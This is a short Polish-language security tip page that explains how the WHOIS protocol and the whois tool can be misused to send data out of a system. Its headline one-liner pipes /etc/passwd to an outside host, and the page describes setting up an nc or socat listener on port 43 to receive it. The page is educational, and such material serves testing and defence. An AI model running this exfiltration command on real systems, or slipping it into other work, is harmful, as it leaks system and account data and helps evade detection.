alphasec academy

whois -h aptm.in "$(cat /etc/passwd)" - eksfiltruj dane z wykorzystaniem usługi WHOIS

Dodatkowe informacje

WHOIS to protokół TCP służący do odpytywań baz DNS (informacje o właścicielu, dane teleadresowe, klasy adresów IP etc). Serwery WHOIS nasłuchują na porcie TCP/43, a komunikacja jest bardzo prosta, co można przeczytać w RFC3912:
3.  Protocol Example

   If one places a request of the WHOIS server located at whois.nic.mil
   for information about "Smith", the packets on the wire will look
   like:

   client                           server at whois.nic.mil

   open TCP   ---- (SYN) ------------------------------>
              <---- (SYN+ACK) -------------------------
   send query ---- "Smith" -------------------->
   get answer <---- "Info about Smith" ---------
              <---- "More info about Smith" ----
   close      <---- (FIN) ------------------------------ 
Czyli wystarczy połączyć się z portem 43 danego serwera whois, wysłać zapytanie w postaci adresu IP/domeny, o które pytamy zakończone znakiem nowej linii i serwer nam zwróci odpowiedź. Można do tego użyć nawet nc czy telnet:
    🐉 drg@dhq[~]$ nc whois.nask.pl 43
    nask.pl
    
    DOMAIN NAME:           nask.pl
    registrant type:       organization
    nameservers:           bilbo.nask.pl. [195.187.245.51]
                           eomer.nask.pl. [193.59.201.24]
                           kirdan.nask.pl. [195.187.244.8]
                           nms.cyf-kr.edu.pl. [149.156.1.3]
                           ns.tpnet.pl. [80.50.50.50]
    created:               1995.04.26 13:00:00
    [...] 
Do odpytywania baz WHOIS w systemach Linux/Unix tradycyjnie służy narzędzie whois. Dzięki opcjom
-h
oraz
-p
można wskazać konkretny host i port do odpytania. Zatem wskazując swój własny serwer, na którym uruchomimy listener w postaci
nc -l 43
czy jeszcze lepiej -
socat
-a (zobacz aptm.in/protip/0013, aptm.in/protip/001b) wykorzystujemy legitne narzędzie do eksfiltracji danych.

Przydatne linki


Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.